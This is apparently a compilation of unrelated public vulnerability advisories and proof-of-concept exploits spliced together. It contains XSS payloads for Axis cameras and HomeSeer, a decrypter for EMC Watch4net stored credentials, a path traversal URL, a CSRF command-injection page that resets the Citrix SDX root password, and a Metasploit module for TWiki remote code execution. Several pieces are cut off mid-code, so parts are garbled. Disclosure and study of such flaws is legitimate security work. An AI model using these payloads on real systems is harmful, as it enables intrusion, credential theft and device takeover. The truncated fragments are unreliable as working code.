source: http://www.securityfocus.com/bid/50968/info

Axis M10 Series Network Cameras are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Axis M1054 firmware 5.21 is vulnerable; other version may also be affected.

http://www.example.com/admin/showReport.shtml?content=serverreport.cgi&pageTitle=%3C%2Ftitle%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3B%3C%2Fscript%3E%3Ctitle%3E

source: http://www.securityfocus.com/bid/50978/info

HS2 web interface is prone to multiple security vulnerabilities:

1. An HTML-injection vulnerability.

2. A cross-site request-forgery vulnerability.

3. A directory-traversal vulnerability.

Attackers can exploit these issues to perform certain actions in the context of an authorized user's session, run arbitrary HTML and script code, and transfer files outside of the web directory. Other attacks may also be possible.

HomeSeer HS2 2.5.0.20 is vulnerable; prior versions may also be affected.

http://www.example.com/example<script>alert(document.cookie)</script>

Abstract

It was discovered that EMC M&R (Watch4net) credentials of remote servers stored in Watch4net are encrypted using a fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial to decrypt them.

Affected products

EMC reports that the following products are affected by this vulnerability:

- EMC M&R (Watch4Net) versions prior 6.5u1

- EMC ViPR SRM versions prior to 3.6.1

See also

- CVE-2015-0514

- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities

- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities (login required)

Fix

EMC released the following updated versions that resolve this vulnerability:

- EMC M&R (Watch4Net) 6.5u1

- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM.

Introduction

EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard.

The Remote-Shell-Collector module from EMC M&R (Watch4net) can push and run executable files on remote hosts to collect performance data from storage environments. Remote-Shell-Collector uses SSH for this purpose.

In order to push and collect monitoring data, accounts are created on the remote servers and credentials of these remote servers are stored in Watch4net. These credentials are encrypted using a fixed hardcoded password. If an attacker manages to obtain a copy of the encrypted credentials, it is trivial to decrypt them.

Details

Due to insecure use of cryptography the credentials of these remote host can be decrypted using the Java class com.watch4net.apg.v2.common.config.tools.Utils.process().

Proof of concept

import com.watch4net.apg.v2.common.config.tools.Utils;

public class Watch4NetCrypt {

private static void print(String out) {

System.out.println(out);

}

private static void usage() {

print("Usage:\t watch4netcrypt [-e] password");

print("\t watch4netcrypt [-d] encrypted");

System.exit(1);

}

public static void main(String[] args) {

if (args.length != 2 || !("-e".equals(args[0]) || "-d".equals(args[0]))) {

usage();

}

Boolean encrypt = "-e".equals(args[0]);

String password = args[1];

if (password != null) {

print(Utils.process(password, encrypt, "centralized", null));

}

}

Abstract

A path traversal vulnerability was found in EMC M&R (Watch4net) Device Discovery. This vulnerability allows an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Affected products

EMC reports that the following products are affected by this vulnerability:

- EMC M&R (Watch4Net) versions prior 6.5u1

- EMC ViPR SRM versions prior to 3.6.1

See also

- CVE-2015-0516

- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities

- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities (login required)

Fix

EMC released the following updated versions that resolve this vulnerability:

- EMC M&R (Watch4Net) 6.5u1

- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM.

Introduction

EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard.

A path traversal vulnerability was found in M&R (Watch4net) Device Discovery. Path traversal vulnerabilities arise when user-controllable data is used insecurely within a file system operation. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file.

Details

This vulnerability can be trigger via de fileFileName URL parameter of the /device-discovery/devicesource/downloadSeedFile page. An authenticated attacker can supply path traversal sequences to break out of the intended download directory and read files elsewhere on the file system. This allows the attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

The following URL can be used to demonstrate this issue:

http://<target>:58080/device-discovery/devicesource/downloadSeedFile?fileFileName=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts

source: http://www.securityfocus.com/bid/50938/info

The Linux kernel is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause an out-of-memory error in certain linux applications, resulting in denial-of-service conditions.

Linux kernel versions 2.6.35 and earlier are affected.

$ for i in 1 2 3 4 5 6 7 8 ; do ./feedftp $i >/dev/null & done

source: http://www.securityfocus.com/bid/50982/info

HP Application Lifestyle Management is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges.

cat > file << EOF

mkfifo /tmp/tmp.txt # set trap

cat /tmp/tmp.txt # blocks for victim

while [ -e /tmp/tmp.txt ]; do

cat file > /tmp/tmp.txt

sleep 2

rm file

Abstract

Securify discovered a command injection vulnerability in xen_hotfix page of the NITRO SDK. The attacker-supplied command is executed with elevated privileges (nsroot). This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.

Tested version

This issue was discovered in Citrix NetScaler SDX svm-10.5-50-1.9, other versions may also be affected.

Fix

Citrix reports that this vulnerability is fixed in NetScaler 10.5 build 52.3nc.

Introduction

The Citrix NetScaler SDX platform delivers fully isolated NetScaler instances running on a single appliance. Each instance is a full-blown NetScaler environment, which optimizes delivery of applications over the Internet and private networks. The NITRO SDK allows you to configure and monitor the NetScaler appliance programmatically. NITRO exposes its functionality through REST interfaces. A Cross-Site Scripting vulnerability was found in one of the REST services exposed by the NITRO SDK.

Administrators can upload XenServer hotfixes to the Citrix SDX appliance. The REST interface responsible for handling these hotfixes is vulnerable to command injection.

Details

This vulberability exists because the file_name parameter submitted to the /nitro/v1/config/xen_hotfix page used in a shell command without proper input validation/sanitation, introducing a command execution vulnerability. The shell command is executed with elevated privileges (nsroot), which allows attackers to run arbitrary commands with these privileges. This issue can be used to compromise of the entire Citrix SDX appliance and all underling application's and data.

The following proof of concept can be used to exploit this issue;

<html>

<body>

<form action="https://SDXHOSTIP/nitro/v1/config/xen_hotfix" method="POST">

<input type="hidden" name="object" value="&#123;"params"&#58;&#123;"action"&#58;"start"&#125;&#44;"xen&#95;hotfix"&#58;&#91;&#123;"file&#95;name"&#58;"&#46;&#46;&#47;&#46;&#46;&#47;etc&#47;passwd&#59;echo&#32;nsroot&#58;Securify&#124;chpasswd&#59;"&#125;&#93;&#125;" />

<input type="submit" value="Submit request" />

</form>

<script>document.forms[0].submit();</script>

</body>

</html>

POST /nitro/v1/config/xen_hotfix HTTP/1.1

-----------------------------------------

object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]}

or

object={"params"%3a{"action"%3a"start"}%2c"xen_hotfix"%3a[{"file_name"%3a"../../etc/passwd;echo nsroot:han|chpasswd;"}]}

Due to insufficient Cross-Site Request Forgery protection, it is possible to exploit this issue by tricking a logged in admin user into visiting a specially crafted web page.

source: http://www.securityfocus.com/bid/50940/info

Apache Struts is prone to a security-bypass vulnerability that allows session tampering.

Successful attacks will allow attackers to bypass security restrictions and gain unauthorized access.

Apache Struts versions 2.0.9 and 2.1.8.1 are vulnerable; other versions may also be affected.

http://www.example.com/SomeAction.action?session.somekey=someValue

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'TWiki Debugenableplugins Remote Code Execution',

'Description' => %q{

'Author' =>

[

'Netanel Rubin', # from Check Point - Discovery

'h0ng10', # Metasploit Module

],

'License' => MSF_LICENSE,

'References' =>

[

[ 'CVE', '2014-7236'],

[ 'OSVDB', '112977'],

[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']

],

'Privileged' => false,

'Targets' =>

[

[ 'Automatic',

{

'Payload' =>

{

'BadChars' => "",

'Compat' =>

{

'PayloadType' => 'cmd',

'RequiredCmd' => 'generic perl python php',

}

},

'Platform' => ['unix'],

'Arch' => ARCH_CMD

}

]

],

'DefaultTarget' => 0,

'DisclosureDate' => 'Oct 09 2014'))

register_options(

[

OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),

OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])

], self.class)

end

def send_code(perl_code)

uri = target_uri.path

data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"

res = send_request_cgi!({

'method' => 'POST',

'uri' => uri,

'data' => data

})

return res

end

def check

rand_1 = rand_text_alpha(5)

rand_2 = rand_text_alpha(5)

code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"

res = send_code(code)

if res and res.code == 200

return CheckCode::Vulnerable if res.body == rand_1 + rand_2

end

CheckCode::Unknown

end

def exploit

code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"

code += "require('MIME/Base64.pm');MIME::Base64->import();"

code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"

res = send_code(code)

handler

end